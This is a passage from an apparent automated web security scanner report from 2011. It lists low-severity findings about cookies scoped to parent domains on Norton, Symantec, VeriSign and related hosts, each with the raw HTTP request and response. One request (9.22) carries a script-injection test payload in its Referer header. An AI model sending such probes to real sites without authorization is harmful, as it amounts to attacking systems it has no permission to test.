symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:20 GMT Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=5c55d1c3-a981-4fb5-9327-d629b62b51071315603880402 Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:18; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: LANGUAGE=EN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 397 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/up...[SNIP]...
9.20. http://buy.symanteccloud.com/freetrial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.symanteccloud.com
Path:
/freetrial
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /freetrial HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 471 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
9.21. http://buy.symanteccloud.com/smbstore
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.symanteccloud.com
Path:
/smbstore
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smbstore HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 459 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
9.22. http://free.pctools.com/res/js/utils.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://free.pctools.com
Path:
/res/js/utils.php
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /res/js/utils.php HTTP/1.1 Host: free.pctools.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/ Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.3.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Fri, 09 Sep 2011 22:05:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 22:05:27 GMT Connection: close Vary: Accept-EncodingSet-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com
9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM"Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 154 Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
9.24. http://sales.liveperson.net/hc/2735064/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064 Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998 lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
9.25. http://sales.liveperson.net/hc/71097838/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/products/downloads/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 33062 lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: ApacheSet-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:42 GMT Server: ApacheSet-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: ApacheSet-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:44 GMT Server: ApacheSet-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/trustseal_trial_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trustseal_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:45 GMT Server: ApacheSet-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.31. https://trust-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: ApacheSet-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.32. https://trust-center.verisign.ch/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
